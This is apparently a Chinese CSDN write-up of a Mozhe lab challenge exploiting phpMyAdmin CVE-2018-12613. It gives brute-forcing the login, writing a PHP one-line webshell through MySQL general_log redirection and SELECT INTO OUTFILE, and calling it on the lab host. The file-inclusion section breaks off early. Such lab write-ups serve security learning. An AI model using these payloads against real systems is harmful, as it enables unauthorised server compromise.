墨者靶场 phpMyAdmin后台文件包含分析溯源 (CVE-2018-12613)

本文详细介绍了两种利用phpMyAdmin后台文件包含漏洞(CVE-2018-12613)的方法。首先,通过burp爆破获取账号密码,接着利用MySQL的导入导出功能写入文件,通过访问写入的日志文件和into outfile写入木马。其次,分析index.php和Core.php源码,发现并利用checkPageValidity函数中的白名单绕过,成功读取根目录的key.txt文件。
摘要由CSDN通过智能技术生成

第一种:

一、利用burp爆破出账号密码

image-20210615143749593

image-20210615143707494

二、尝试写马连入蚁剑
1.发现MySQL对导入导出没做任何限制
secure_file_priv为null    	表示不允许导入导出
secure_file_priv			指定文件夹时,表示mysql的导入导出只能发生在指定的文件夹
secure_file_priv			没有设置时,则表示没有任何限制

image-20210615145040648

2.查询日志
show variables like 'general_log%'

image-20210615145329861

3.利用日志写文件
开启general_log:  set global general_log=ON

image-20210615145952653

image-20210615150024774

设置日志写入文件
SET global general_log_file='/var/www/html/cao.php'

image-20210615150945041

4.访问写入的日志文件

image-20210615151422283

6.尝试直接通过into outfile写入一句话木马
select '<?php eval($_REQUEST[cao]); ?>' into outfile '/var/www/html/cao2.php'

image-20210615151703267

7.访问phpinfo文件,并连接蚁剑得到key值
http://219.153.49.228:42067/cao2.php?cao=phpinfo();

image-20210615151811271

在根目录发现key值

image-20210615154822992

第二种:

漏洞详情:

关于漏洞分析可以查看这篇文章CVE-2018-12613phpMyAdmin 后台文件包含漏洞分析

一、下载index.php文件进行分析

image-20210615155927698

1.发现55到63行存在问题
$target_blacklist
  • 5
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 9
    评论
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值